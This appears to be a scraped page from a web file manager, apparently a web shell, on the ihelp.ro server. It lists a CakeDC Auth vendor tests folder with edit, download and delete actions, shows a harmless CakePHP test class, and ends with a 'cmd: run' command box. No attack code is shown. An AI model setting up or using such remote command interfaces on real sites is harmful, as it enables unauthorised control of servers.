/
var
/
www
/
vhosts
/
ihelp.ro
/
httpdocs
/
vendor
/
cakedc
/
auth
/
tests
/
/var/www/vhosts/ihelp.ro/httpdocs/vendor/cakedc/auth/tests
mkdir
upload
Name
Size
Mode
Actions
App/
-
0755
rm
config/
-
0755
rm
Fixture/
-
0755
rm
TestCase/
-
0755
rm
bootstrap.php
3284
0644
edit
dl
rm
TestApplication.php
1179
0644
edit
dl
rm
Edit:
/var/www/vhosts/ihelp.ro/httpdocs/vendor/cakedc/auth/tests/TestApplication.php
(1179B)
<?php declare(strict_types=1); /** * Copyright 2010 - 2019, Cake Development Corporation (https://www.cakedc.com) * * Licensed under The MIT License * Redistributions of files must retain the above copyright notice. * * @copyright Copyright 2010 - 2019, Cake Development Corporation (https://www.cakedc.com) * @license MIT License (http://www.opensource.org/licenses/mit-license.php) */ namespace CakeDC\Auth\Test; use Cake\Http\MiddlewareQueue; /** * Class TestApplication * * @package CakeDC\Auth\Test */ class TestApplication extends \Cake\Http\BaseApplication { /** * Setup the middleware queue * * @param \Cake\Http\MiddlewareQueue $middleware The middleware queue to set in your App Class * @return \Cake\Http\MiddlewareQueue */ public function middleware(MiddlewareQueue $middleware): MiddlewareQueue { return $middleware; } /** * @inheritDoc */ public function bootstrap(): void { parent::bootstrap(); $this->addPlugin('CakeDC/Auth', [ 'path' => dirname(__FILE__, 2) . DS, 'routes' => true, 'bootstrap' => true, ]); } }
Save
cmd:
run